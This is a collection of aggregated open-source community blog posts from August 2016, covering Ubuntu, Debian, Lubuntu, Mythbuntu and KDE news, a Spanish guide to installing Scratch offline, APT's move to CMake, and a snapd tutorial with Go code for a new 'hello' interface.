
This is what data.world is building and I find the combination of access, platform, and network effects of data and community particularly exciting.

Unlocking Curiosity

If we look at the most profound impacts technology has had in recent years it is in bubbling people’s curiosity and creativity to the surface.

When we build community-based platforms that tap into this curiosity and creativity, we generate new ideas and approaches. New ideas and approaches then become the foundation for changing how the world thinks and operates.

screencapture-data-world-1471257465804

As one such example, open source tapped the curiosity and creativity of developers to produce a rich patchwork of software and tooling, but more importantly, a culture of openness and collaboration. While it is easy to see the software as the primary outcome, the impact of open source has been much deeper and impacted skills, education, career opportunities, business, collaboration, and more.

Enabling the same curiosity and creativity with the wealth of data we have in the world is going to be an exciting journey. Stay tuned.

The post Opening Up Data Science with data.world appeared first on Jono Bacon.

on August 18, 2016 03:00 PM

S09E25 – Golden Keys - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

It’s Episode Twenty-five of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

We’re here again!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on August 18, 2016 02:00 PM
The Lubuntu team needs your feedback! We would like to get your input on a poll we have created to gauge your usage of the Lubuntu images. Your feedback is essential in making sure we make the right decision going forward! The poll is located here: http://lubuntu.me/cd-size-poll/ The poll closes on 26 August 2016 at […]
on August 18, 2016 01:16 AM

August 17, 2016

Recently I have been working on the visual design for RCS (which stands for rich communications service) group chat. While working on the “Group Info” screen, we found ourselves wondering what the best way to display an online/offline status. Some of us thought text would be more explicit but others thought  it adds more noise to the screen. We decided that we needed some real data in order to make the best decision.

Usually our user testing is done by a designated Researcher but usually their plates are full and projects bigger, so I decided to make my first foray into user testing. I got some tips from designers who had more experience with user testing on our cloud team; Maria  Vrachni, Carla Berkers and Luca Paulina.

I then set about finding my user testing group. I chose 5 people to start with because you can uncover up to 80% of usability issues from speaking to 5 people. I tried to recruit a range of people to test with and they were:

  1. Billy: software engineer, very tech savvy and tech enthusiast.
  2. Magda: Our former PM and very familiar with our product and designs.
  3. Stefanie: Our Office Manager who knows our products but not so familiar with our designs.
  4. Rodney: Our IS Associate who is tech savvy but not familiar with our design work
  5. Ben: A copyeditor who has no background in tech or design and a light phone user.

The tool I decided to use was Invision. It has a lot of good features and I already had some experience creating lightweight prototypes with it. I made four minimal prototypes where the group info screen had a mixture of dots vs text to represent online status and variations on placement.  I then put these on my phone so my test subjects could interact with it and feel like they were looking at a full fledged app and have the same expectations.

group_chat_testing

During testing, I made sure not to ask my subjects any leading questions. I only asked them very broad questions like “Do you see everything you expect to on this page?” “Is anything unclear?” etc. When testing, it’s important not to lead the test subjects so they can be as objective as possible. Keeping this in mind, it was interesting to to see what the testers noticed and brought up on their own and what patterns arise.

My findings were as follows:

Online status: Text or Green Dot

Unanimously they all preferred online status to be depicted with colour and 4 out of 5 preferred the green dot rather than text because of its scannability.

Online status placement:

This one was close but having the green dot next to the avatar had the edge, again because of its scannability. One tester preferred the dot next to the arrow and another didn’t have a preference on placement.

Pending status:

What was also interesting is that three out of the four thought “pending” had the wrong placement. They felt it should have the same placement as online and offline status.

Overall, it was very interesting to collect real data to support our work and looking forward to the next time which will hopefully be bigger in scope.

group_chat_final

The finished design

on August 17, 2016 03:57 PM

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In July, 136.6 work hours have been dispatched among 11 paid contributors. Their reports are available:

  • Antoine Beaupré has been allocated 4 hours again but in the end he put back his 8 pending hours in the pool for the next months.
  • Balint Reczey did 18 hours (out of 7 hours allocated + 2 remaining, thus keeping 2 extra hours for August).
  • Ben Hutchings did 15 hours (out of 14.7 hours allocated + 1 remaining, keeping 0.7 extra hour for August).
  • Brian May did 14.7 hours.
  • Chris Lamb did 14 hours (out of 14.7 hours, thus keeping 0.7 hours for next month).
  • Emilio Pozuelo Monfort did 13 hours (out of 14.7 hours allocated, thus keeping 1.7 hours extra hours for August).
  • Guido Günther did 8 hours.
  • Markus Koschany did 14.7 hours.
  • Ola Lundqvist did 14 hours (out of 14.7 hours assigned, thus keeping 0.7 extra hours for August).
  • Santiago Ruano Rincón did 14 hours (out of 14.7h allocated + 11.25 remaining, the 11.95 extra hours will be put back in the global pool as Santiago is stepping down).
  • Thorsten Alteholz did 14.7 hours.

Evolution of the situation

The number of sponsored hours jumped to 159 hours per month thanks to GitHub joining as our second platinum sponsor (funding 3 days of work per month)! Our funding goal is getting closer but it’s not there yet.

The security tracker currently lists 22 packages with a known CVE and the dla-needed.txt file likewise. That’s a sharp decline compared to last month.

Thanks to our sponsors

New sponsors are in bold.

2 comments | Liked this article? Click here. | My blog is Flattr-enabled.

on August 17, 2016 02:45 PM

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donators (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

DebConf 16

I was in South Africa for the whole week of DebConf 16 and gave 3 talks/BoF. You can find the slides and the videos in the links of their corresponding page:

I was a bit nervous about the third BoF (on using Debian money to fund Debian projects) but discussed with many persons during the week and it looks like the project evolved quite a bit in the last 10 years and while it’s still a sensitive topic (and rightfully so given the possible impacts) people are willing to discuss the issues and to experiment. You can have a look at the gobby notes that resulted from the live discussion.

I spent most of the time discussing with people and I did not do much technical work besides trying (and failing) to fix accessibility issues with tracker.debian.org (help from knowledgeable people is welcome, see #830213).

Debian Packaging

I uploaded a new version of zim to fix a reproducibility issue (and forwarded the patch upstream).

I uploaded Django 1.8.14 to jessie-backports and had to fix a failing test (pull request).

I uploaded python-django-jsonfield 1.0.1 a new upstream version integrating the patches I prepared in June.

I managed the (small) ftplib library transition. I prepared the new version in experimental, ensured reverse build dependencies do still build and coordinated the transition with the release team. This was all triggered by a reproducible build bug that I got and that made me look at the package… last time upstream had disappeared (upstream URL was even gone) but it looks like he became active again and he pushed a new release.

I filed wishlist bug #832053 to request a new deblog command in devscripts. It should make it easier to display current and former build logs.

Kali related Debian work

I worked on many issues that were affecting Kali (and Debian Testing) users:

  • I made an open-vm-tools NMU to get the package back into testing.
  • I filed #830795 on nautilus and #831737 on pbnj to forward Kali bugs to Debian.
  • I wrote a fontconfig patch to make it ignore .dpkg-tmp files. I also forwarded that patch upstream and filed a related bug in gnome-settings-daemon which is actually causing the problem by running fc-cache at the wrong times.
  • I started a discussion to see how we could fix the synaptics touchpad problem in GNOME 3.20. In the end, we have a new version of xserver-xorg-input-all which only depends on xserver-xorg-input-libinput and not on xserver-xorg-input-synaptics (no longer supported by GNOME). This is after upstream refused to reintroduce synaptics support.
  • I filed #831730 on desktop-base because KDE’s plasma-desktop is no longer using the Debian background by default. I had to seek upstream help to find out a possible solution (deployed in Kali only for now).
  • I filed #832503 because the way dpkg and APT manages foo:any dependencies when foo is not marked “Multi-Arch: allowed” is counter-productive… I discovered this while trying to use a firefox-esr:any dependency. And I filed #832501 to get the desired “Multi-Arch: allowed” marker on firefox-esr.

Thanks

See you next month for a new summary of my activities.

3 comments | Liked this article? Click here. | My blog is Flattr-enabled.

on August 17, 2016 10:53 AM

August 15, 2016

Welcome to the Ubuntu Weekly Newsletter. This is issue #478 for the week August 8 – 14, 2016, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Athul Muralidhar
  • Chris Sirrs
  • Paul White
  • Simon Quigley
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

on August 15, 2016 09:22 PM

Convergent terminal

Canonical Design Team

We have been looking at ways of making the Terminal app more pleasing, in terms of the user experience, as well as the visuals.

I would like to share the work so far, invite users of the app to comment on the new designs, and share ideas on what other new features would be desirable.

On the visual side, we have brought the app in line with our Suru visual language. We have also adopted the very nice Solarized palette as the default palette – though this will of course be completely customisable by the user.

On the functionality side we are proposing a number of improvements:

-Keyboard shortcuts
-Ability to completely customise touch/keyboard shortcuts
-Ability to split the screen horizontally/vertically (similar to Terminator)
-Ability to easily customise the palette colours, and window transparency (on desktop)
-Unlimited history/scrollback
-Adding a “find” action for searching the history

email-desktop

Tabs and split screen

On larger screens tabs will be visually persistent. In addition it’s desirable to be able split a panel horizontally and vertically, and use keyboard shortcuts or focusing with a mouse/touch to move between the focused panel.

On mobile, the tabs will be accessed through the bottom edge, as on the browser app.

terminal-blog-phone

Quick mobile access to shortcuts and commands

We are discussing the option of having modifier (Ctrl, Alt etc) keys working together with the on-screen keyboard on touch – which would be a very welcome addition. While this is possible to do in theory with our on-screen keyboard, it’s something that won’t land in the immediate near future. In the interim modifier key combinations will still be accessible on touch via the shortcuts at the bottom of the screen. We also want to make these shortcuts ordered by recency, and have the ability to add your own custom key shortcuts and commands.

We are also discussing with the on-screen keyboard devs about adding an app specific auto-correct dictionary – in this case terminal commands – that together with a swipe keyboard should make a much nicer mobile terminal user experience.

email-desktop

More themability

We would like the user to be able to define their own custom themes more easily, either via in-app settings with colour picker and theme import, or by editing a JSON configuration file. We would also like to be able to choose the window transparency (in windowed mode), as some users want a see-through terminal.

We need your help!

These visuals are work in progress – we would love to hear what kind of features you would like to see in your favourite terminal app!

Also, as Terminal app is a fully community developed project, we are looking for one or two experienced Qt/QML developers with time to contribute to lead the implementation of these designs. Please reach out to alan.pope@canonical.com or jouni.helminen@canonical.com to discuss details!

EDIT: To clarify – these proposed visuals are improvements for the community developed terminal app currently available for the phone and tablet. We hope to improve it, but it is still not as mature as older terminal apps. You should still be able to run your current favourite terminal (like gnome-terminal, Terminator etc) in Unity8.

on August 15, 2016 04:24 PM

Hola a todos, después de tanto tiempo me he permitido escribir este artículo como propósito de compartir una experiencia vivida hace poco a través de un programa de formación presentado por www.zuliatec.com llamado Procodi www.procodi.com, programa de formación para niños donde les brinda desde muy temprana edad herramientas que les permiten a ellos desarrollar habilidades y destreza en las áreas de desarrollo, diseño gráfico, Electrónica Digital, Robótica, Medios digitales y música digital.

Scratch (Cómo lo dice su misma página web), está diseñado especialmente para edades entre los 8 y 16 años, pero es usado por personas de todas las edades. Millones de personas están creando proyectos en Scratch en una amplia variedad de entornos, incluyendo hogares, escuelas, museos, bibliotecas y centros comunitarios.

También cita: La capacidad de codificar programas de computador es una parte importante de la alfabetización en la sociedad actual. Cuando las personas aprenden a programar en Scratch, aprenden estrategias importantes para la solución de problemas, diseño de proyectos, y la comunicación de ideas.

Dado a que es muy provechoso esta herramienta tanto para niños como para los adultos me dedico a explicarle de una manera sencilla como hacer funcionar el programa desde GNU/Linux de manera OffLine.

Si usas Gnome o derivado es necesario tener instalado una librería que tiene como nombre Gnome-Keyring y si usas KDE debes tener instalado Kde-Wallet.

Para este ejemplo explico como hacer funcionado Scratch para Linux Mint y que puede servir para S.O derivados para Debian.

  1. Descarga primero desde la web oficial de Scratch https://scratch.mit.edu/scratch2download/ los archivos para instalar Adobe Air y Scratch para Linux, también está disponible para Windows y para Mac.
  2. Luego instalar gnome-keyring: sudo aptitude install gnome-keyring
  3. Agregar dos enlaces simbólicos a la carpeta /usr/lib/ de la siguiente manera: sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0 /usr/lib/libgnome-keyring.so.0 && sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0.2.0 /usr/lib/libgnome-keyring.so.0.2.0
  4. Luego te posiciones desde la consola donde se encuentre el instalador de Adobe Air, y desde allí ejecutar lo siguiente: chmod +x AdobeAIRInstaller.bin && ./AdobeAIRInstaller.bin
  5. Sigue todos los pasos que te indique el instalador y ten un poco de paciencia.
  6. Ya instalado el Adobe Air, buscamos gráficamente el archivo Scratch-448.air y lo abrimos con Adobe AIR application Instaler. También hay que tener un poco de paciencia, pero al terminar te generará un enlace en tu escritorio donde podrás acceder al sistema las veces que desees.

Con lo ante expuesto ya podemos utilizar Scratch OffLine, pero recuerda que si entraste en la web oficial del proyecto pudiste haber notado que también lo podemos utilizar en linea.

Happy Hacking.


on August 15, 2016 11:03 AM

A while back, I found myself in need of some TLS certificates set up and issued for a testing environment.

I remembered there was some code for issuing TLS certs in Docker, so I yanked some of that code and made a sensable CLI API over it.

Thus was born minica!

Something as simple as minica tag@domain.tls domain.tld will issue two TLS certs (one with a Client EKU, and one server) issued from a single CA.

Next time you’re in need of a few TLS keys (without having to worry about stuff like revocation or anything), this might be the quickest way out!

on August 15, 2016 12:40 AM

August 13, 2016

This blog post is not an announcement of any kind or even an official plan. This may even be outdated, so check the links I provide for additional info.

As you may have seen, the Lubuntu team (which I am a part of) has started the migration process to LXQt. It's going to be a long process, but I thought I might write about some of the things that goes into this process.

Step 1 - Getting a metapackage

This step is already done, and it's installable last time I checked in a Virtual Machine. The metapackage is lubuntu-qt-desktop, but there's a lot to be desired.

While we already have this package, there's a lot to be tweaked. I've been running LXQt with the Lubuntu artwork as my daily driver for a few months now, and there's a lot missing that needs to be tweaked. So while you have the ability to install the package and play around with it, it needs to be a lot different to be usable.

Also in this image are our candidates (not final yet) for applications that will be included in Lubuntu. Here's a current list of what's on the image:

An up-to-date listing of the software in this metapackage is available here.

Step 2 - Getting an image

The next step is getting a working image for the team to test. The two outstanding merge proposals adding this have been merged, and we're now waiting for the images to be spun up and added to the ISO QA Tracker for testers.

Having this image will help us gauge how much system resources are used, and gives us the ability to run some benchmarks on the desktop. This will come after the image is ready and spins up correctly.

Step 3 - Testing

An essential part of any good operating system is the testing. We need to create some LXQt-specific test cases and make sure the ISO QA test cases are working before we can release a reliable image to our users.

As mentioned before, we need test cases. We created a blueprint last cycle tracking our progress with test cases, and the sooner that those are done, the sooner Lubuntu can make the switch knowing that all of our selected applications work fine.

Step 4 - Picking applications

This is the tough step in all of this. We need to pick the applications that best suit our users' use cases (a lot of our users run on older hardware) and needs (LibreOffice for example). Every application will most likely need a week or two to do proper benchmarking and testing, but if you have a suggestion for an application that you would like to see in Lubuntu, share your feedback on the blueprints. This is the best way to let us know what you would like to see and your feedback on the existing applications before we make a final decision.

Final thoughts

I've been using LXQt for a while now, and it has a lot of advantages not only in applications, but the desktop itself. Depending on how notable some things are, I might do a blog post in the future, otherwise, see for yourself. :)

Here is our blueprint that will be updated a lot in the next week or so that will tell you more about the transition. If you have any questions, shoot me an email at tsimonq2@lubuntu.me or send an email to the Lubuntu-devel mailing list.

I'm really excited for this transition, and I hope you are too.

on August 13, 2016 06:18 PM

August 11, 2016

S09E24 – Elementary Penguin - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

It’s Episode Twenty-four of Season Nine of the Ubuntu Podcast! Mark Johnson, Alan Pope, Laura Cowen, and Martin Wimpress are here again.

We’re here – all of us!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on August 11, 2016 02:00 PM

I recently discovered Martin O’Leary‘s Feeling Old twitter bot,1 which has a big list of “things that have happened” and then constructs comparisons such as “Y2K was as close to the release of Return of the Jedi as to now”, to make you do that weird “wow, I am old!” double-take. As Martin says, it occasionally throws out a gem. But, looking through the list, I think that they’re probably all gems, but whether they hit home for you depends on how old you are.

Basically, the form of the sentence is: thing is closer to old thing than to today. Ideally, you want thing to be something that you think is recent, and old thing to be something that you think is ancient, and therefore you’ll be surprised that thing really isn’t actually recent and that’s because you’re a decrepit old codger.

My theory is this: old thing ought to be before you were born. By definition, anything that happens before you were born feels like a long time ago to you. And the gap between thing and old thing is the same as the gap between thing and now (because that’s what constructs the sentences). So thing has to happen in the first half of your life. Stuff that happens while you’re a young child also feels like a long time ago — you were a kid when it happened! — so we want something that happened once you started to feel like you in your head. Say, around 12 or so years of age. Thus, we take a big list of pop culture things, find an event which happened between the ages of 12 and half your current age, find a corresponding old event, display them to you, and have you be surprised and displeased. It’s a living.

Give it a try.

I was born

  1. because I was reading his excellent work on how to create accurate looking fantasy maps
on August 11, 2016 01:14 PM

I’ll start this off with mentioning that I’m on Plasma 5.7.2 so you might not see these features (yet!).

timezone-feature

Since I started working with a global team I’ve hit the unforgiving thing called Time Zones, so my first feature will be covering the ‘Digital Clock’ widget. I’m sorry to report that those of you who love that ‘Fuzzy Clock’ widget are missing this feature. With this widget I can add Time Zones by simply right-clicking the widget if it’s one of your panels already or on your desktop.right-click-settingsIf the widget is in the panel then you can just right click it like so. (Look above)

left-press-hold

But if you have the widget on your desktop you have to press and hold it with left click like so. (Look above)

left-press-settings

It will turn a light blue and a pop up will well… pop up with some buttons. The bottom one is the one we want. (Look above)

digital-clock-settings

Either from the panel widget or the desktop widget we will get this window. (Look above) From here we can search for Time Zones based on cities ex. London being the capital of England or my state falling into the Time Zone of New York.

 

on August 11, 2016 03:54 AM

CORRECTION 2016.04.23 - It was previously stated that 16.04 is a point release to 14.04. This was due to a silly copy&paste issue from our previous release statement for 14.04. The Mythbuntu 16.04 release is a flavor of Ubuntu 16.04. We're sorry for any confusion this has caused.


Mythbuntu 16.04 has been released. This is our third LTS release and will be supported until shortly after the 18.04 release.

The Mythbuntu team would like to thank our ISO testers for helping find critical bugs before release. You guys rock!

With this release, we are providing torrents only. It is very important to note that this release is only compatible with MythTV 0.28 systems. The MythTV component of previous Mythbuntu releases can be be upgraded to a compatible MythTV version by using the Mythbuntu Repos. For a more detailed explanation, see here.

You can get the Mythbuntu ISO from our downloads page.

Highlights

Underlying system

  • Underlying Ubuntu updates are found here

MythTV


We appreciated all comments and would love to hear what you think. Please make comments to our mailing list, on the forums (with a tag indicating that this is from 16.04 or xenial), or in #ubuntu-mythtv on Freenode. As previously, if you encounter any issues with anything in this release, please file a bug using the Ubuntu bug tool (ubuntu-bug PACKAGENAME) which automatically collects logs and other important system information, or if that is not possible, directly open a ticket on Launchpad (http://bugs.launchpad.net/mythbuntu/16.04/).

Upgrade Nodes

If you have enabled the mysql tweaks in the Mythbuntu Control Center these will need to be disabled prior to upgrading. Once upgraded, these can be reenabled.

Known issues

on August 11, 2016 12:26 AM

August 10, 2016

Porting APT to CMake

Julian Andres Klode

Ever since it’s creation back in the dark ages, APT shipped with it’s own build system consisting of autoconf and a bunch of makefiles. In 2009, I felt like replacing that with something more standard, and because nobody really liked autotools, decided to go with CMake. Well, the bazaar branch was never really merged back in 2009.

Fast forward 7 years to 2016. A few months ago, we noticed that our build system had trouble with correct dependencies in parallel building. So, in search for a way out, I picked up my CMake branch from 2009 last Thursday and spent the whole weekend working on it, and today I am happy to announce that I merged it into master:

123 files changed, 1674 insertions(+), 3205 deletions(-)

More than 1500 lines less build system code. Quite impressive, eh? This also includes about 200 lines of less code in debian/, as that switched from prehistoric debhelper stuff to modern dh (compat level 9, almost ready for 10).

The annoying Tale of Targets vs Files

Talking about CMake: I don’t really love it. As you might know, CMake differentiates between targets and files. Targets can in some cases depend on files (generated by a command in the same directory), but overall files are not really targets. You also cannot have a target with the same name as a file you are generating in a custom command, you have to rename your target (make is OK with the generated stuff, but ninja complains about cycles because your custom target and your custom command have the same name).

Byproducts for the (time) win

One interesting thing about CMake and Ninja are byproducts. In our tree, we are building C++ files. We also have .pot templates depending on them, and .mo files depending on the templates (we have multiple domains, and merge the per-domain .pot with the all-domain .po file during the build to get a per-domain .mo). Now, if we just let them depend naively, changing a C++ file causes the .pot file to be regenerated which in turns causes us to build .mo files for every freaking language in the package. Even if nothing changed.

Byproducts solve this problem. Instead of just building the .pot file, we also create a stamp file (AKA the witness) and write the .pot file (without a header) into a temporary name and only copy it to its final name if the content changed. The .pot file is declared as a byproduct of the command.

The command doing the .pot->.mo step still depends on the .pot file (the byproduct), but as that only changes now if strings change, the .mo files only get rebuild if I change a translatable string. We still need to ensure that that the .pot file is actually built before we try to use it – the solution here is to specify a custom target depending on the witness and then have the target containing the .mo build commands depend on that target.

Now if you use  make, you might now this trick already. In make, the byproducts remain undeclared, though, while in CMake we can now actually express them, and they are used by the Ninja generator and the Ninja build tool if you chose that over make (try it out, it’s fast).

Further Work

Some command names are hardcoded, I should find_program() them. Also cross-building the package does not yet work successfully, but it only requires a tiny amount of patches in debhelper and/or cmake.

I also tried building the package on a Fedora docker image (with dpkg installed, it’s available in the Fedora sources). While I could eventually get the programs build and most of the integration test suite to pass, there are some minor issues to fix, mostly in the documentation building and GTest department: Fedora ships its docbook stylesheets in a different location, and ships GTest as a pre-compiled library, and not a source tree.

I have not yet tested building on exotic platforms like macOS, or even a BSD. Please do and report back. In Debian, CMake is not up-to.date enough on the non-Linux platforms to build APT due to test suite failures, I hope those can be fixed/disabled soon (it appears to be a timing issue AFAICT).

I hope that we eventually get some non-Debian backends for APT. I’d love that.


Filed under: Debian, Uncategorized
on August 10, 2016 03:52 PM

Today is a day I've been waiting for a long time. We now have enough knowledge to create our first real interface from scratch. To really understand this content you need to be familiar with parts [1], [2], [3] and [4].

We will go all the way, from branching snapd all the way to running a program that uses our new interface. We will focus on the ancillary tasks this time, the actual interface will be rather basic. Still, this knowledge will be invaluable next time where we will try to do something more complicated.

Adding the new "hello" interface


Let's get started. It all begins with snapd. If you didn't already, fork snapd and clone your fork locally. You may find this small guide that I wrote earlier useful. It goes through all those steps in detail. At the end of the exercise you should be able to build your fork of snapd (make sure it is really your fork, not the upstream version!)

Let's look around. Each time a new interface is added, the following files are modified:
  • The file interfaces/builtin/foo{,_test}.go contains the actual interface
  • The file interfaces/builtin/all{,_test}.go contains tiny change that is used to register a new interface
In addition, if the interface slot should implicitly show up on the core snap we need to change the file snap/implicit{,_test}.go. We will get back to this.

So let's create our new interface now. As mentioned in part [3] this entails implementing a new type with a few methods. Let's do that now:

Using your favorite code editor create a new file and save it as interfaces/builtin/hello.go. Paste the following code inside:


// -*- Mode: Go; indent-tabs-mode: t -*-

/*
* Copyright (C) 2016 Canonical Ltd
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 3 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/

package builtin

import (
"fmt"

"github.com/snapcore/snapd/interfaces"
)

// HelloInterface is the hello interface for a tutorial.
type HelloInterface struct{}

// String returns the same value as Name().
func (iface *HelloInterface) Name() string {
return "hello"
}

// SanitizeSlot checks and possibly modifies a slot.
func (iface *HelloInterface) SanitizeSlot(slot *interfaces.Slot) error {
if iface.Name() != slot.Interface {
panic(fmt.Sprintf("slot is not of interface %q", iface))
}
// NOTE: currently we don't check anything on the slot side.
return nil
}

// SanitizePlug checks and possibly modifies a plug.
func (iface *HelloInterface) SanitizePlug(plug *interfaces.Plug) error {
if iface.Name() != plug.Interface {
panic(fmt.Sprintf("plug is not of interface %q", iface))
}
// NOTE: currently we don't check anything on the plug side.
return nil
}

// ConnectedSlotSnippet returns security snippet specific to a given connection between the hello slot and some plug.
func (iface *HelloInterface) ConnectedSlotSnippet(plug *interfaces.Plug, slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
switch securitySystem {
case interfaces.SecurityAppArmor:
return nil, nil
case interfaces.SecuritySecComp:
return nil, nil
case interfaces.SecurityDBus:
return nil, nil
case interfaces.SecurityUDev:
return nil, nil
case interfaces.SecurityMount:
return nil, nil
default:
return nil, interfaces.ErrUnknownSecurity
}
}

// PermanentSlotSnippet returns security snippet permanently granted to hello slots.
func (iface *HelloInterface) PermanentSlotSnippet(slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
switch securitySystem {
case interfaces.SecurityAppArmor:
return nil, nil
case interfaces.SecuritySecComp:
return nil, nil
case interfaces.SecurityDBus:
return nil, nil
case interfaces.SecurityUDev:
return nil, nil
case interfaces.SecurityMount:
return nil, nil
default:
return nil, interfaces.ErrUnknownSecurity
}
}

// ConnectedPlugSnippet returns security snippet specific to a given connection between the hello plug and some slot.
func (iface *HelloInterface) ConnectedPlugSnippet(plug *interfaces.Plug, slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
switch securitySystem {
case interfaces.SecurityAppArmor:
return nil, nil
case interfaces.SecuritySecComp:
return nil, nil
case interfaces.SecurityDBus:
return nil, nil
case interfaces.SecurityUDev:
return nil, nil
case interfaces.SecurityMount:
return nil, nil
default:
return nil, interfaces.ErrUnknownSecurity
}
}

// PermanentPlugSnippet returns the configuration snippet required to use a hello interface.
func (iface *HelloInterface) PermanentPlugSnippet(plug *interfaces.Plug, securitySystem interfaces.SecuritySystem) ([]byte, error) {
switch securitySystem {
case interfaces.SecurityAppArmor:
return nil, nil
case interfaces.SecuritySecComp:
return nil, nil
case interfaces.SecurityDBus:
return nil, nil
case interfaces.SecurityUDev:
return nil, nil
case interfaces.SecurityMount:
return nil, nil
default:
return nil, interfaces.ErrUnknownSecurity
}
}

// AutoConnect returns true if plugs and slots should be implicitly
// auto-connected when an unambiguous connection candidate is available.
//
// This interface does not auto-connect.
func (iface *HelloInterface) AutoConnect() bool {
return false
}

TIP: Any time you are making code changes use go fmt to re-format all of the code in the current working directory to the go formatting standards. Static analysis checkers in the snappy tree enforce this so your code won't be able to land without first being formatted correctly.

This code is perfectly fine, if a little verbose (we'll get it shorter eventually, I promise). Now let's make one more change to ensure the interface known to snapd. All we need to do is to add it to the allInterfaces list in the same golang package. I've decided to just use an init() function so that all of the changes are in one file and cause less conflicts for other developers creating their interfaces. You can see my patch below.

diff --git a/interfaces/builtin/all_test.go b/interfaces/builtin/all_test.go
index 46ca587..86c8fad 100644
--- a/interfaces/builtin/all_test.go
+++ b/interfaces/builtin/all_test.go
@@ -62,4 +62,5 @@ func (s *AllSuite) TestInterfaces(c *C) {
c.Check(all, DeepContains, builtin.NewCupsControlInterface())
c.Check(all, DeepContains, builtin.NewOpticalDriveInterface())
c.Check(all, DeepContains, builtin.NewCameraInterface())
+ c.Check(all, Contains, &builtin.HelloInterface{})
}
diff --git a/interfaces/builtin/hello.go b/interfaces/builtin/hello.go
index d791fc5..616985e 100644
--- a/interfaces/builtin/hello.go
+++ b/interfaces/builtin/hello.go
@@ -130,3 +130,7 @@ func (iface *HelloInterface) PermanentPlugSnippet(plug *interfaces.Plug, securit
func (iface *HelloInterface) AutoConnect() bool {
return false
}
+
+func init() {
+ allInterfaces = append(allInterfaces, &HelloInterface{})
+}


Now switch to the snap/ directory, edit the file implicit.go and add "hello" to implicitClassicSlots. You can see the whole change below. I also updated the test that checks the number of implicitly added slots. This change will make snapd create a hello slot on the core snap automatically. As you can see by looking at the file, there are many interfaces that take advantage of this little trick.

diff --git a/snap/implicit.go b/snap/implicit.go
index 3df6810..098b312 100644
--- a/snap/implicit.go
+++ b/snap/implicit.go
@@ -60,6 +60,7 @@ var implicitClassicSlots = []string{
"pulseaudio",
"unity7",
"x11",
+ "hello",
}

// AddImplicitSlots adds implicitly defined slots to a given snap.
diff --git a/snap/implicit_test.go b/snap/implicit_test.go
index e9c4b07..364a6ef 100644
--- a/snap/implicit_test.go
+++ b/snap/implicit_test.go
@@ -56,7 +56,7 @@ func (s *InfoSnapYamlTestSuite) TestAddImplicitSlotsOnClassic(c *C) {
c.Assert(info.Slots["unity7"].Interface, Equals, "unity7")
c.Assert(info.Slots["unity7"].Name, Equals, "unity7")
c.Assert(info.Slots["unity7"].Snap, Equals, info)
- c.Assert(info.Slots, HasLen, 29)
+ c.Assert(info.Slots, HasLen, 30)
}

func (s *InfoSnapYamlTestSuite) TestImplicitSlotsAreRealInterfaces(c *C) {


Now let's see what we have. You should have three patches:
  1. The first one adding the dummy hello interface
  2. The second one registering it with allInterfaces
  3. The third one adding it to implicit slots on the core snap, on classic

This is how it looked like for me. You can also see the particular commit message style I was using. All the commits are prefixed with the directory where the changes were made, followed by a colon and by the summary of the change. Normally I would also add longer descriptions but here this is not required as the changes are trivial.




Seeing our interface for the first time


Let's run our changed code with
devtools. Switch to the devtools directory and run:
./refresh-bits snapd setup run-snapd restore

This roughly means:
  1. Build snapd from source (based on correctly set $GOPATH)
  2. Prepare for running locally built snapd
  3. Run locally built snapd
  4. Restore regular version of snapd

The script will prompt you for your password. This is required to perform the system-wide operations. It will also block and wait until you interrupt it by pressing control-c. Please don't do this yet though, we want to check if our changes really made it through.




To check this we can simply list the available interfaces with

sudo snap interfaces | grep hello

Why sudo? Because of the particular peculiarity of how refresh-bits works. Normally it is not required. Did it work? It did for me:



TIP: If it didn't work for you and you didn't get the hello interface then the most likely cause of the issue is that you were editing your own fork but refresh-bits still built the vanilla upstream version that is checked out somewhere else.

Go to $GOPATH/src/github.com/snapcore/snapd and ensure that this is indeed the fork you were expecting. If not just remove this directory and move your fork (that you may have cloned elsewhere) here and try again.


Great. Now we are in business. Let's recap what we did so far:
  • We added a whole new interface by dropping boilerplate code into interfaces/builtin/hello.go
  • We registered the interface in the list of allInterfaces
  • We made snapd inject an implicit (internally defined) slot on the core snap when running on classic
  • We used refresh-bits to run our locally built version and confirmed it really works

Granting permissions through interfaces


With the scaffolding in place we can now work on using our new interface to actually grant additional permissions. When designing real interfaces you have to think about what kind of action should grant extra permissions. Recall from part [3] that you can freely associate extra security snippets that encapsulate permissions either permanent or connection-based snippets on both plugs and slots.

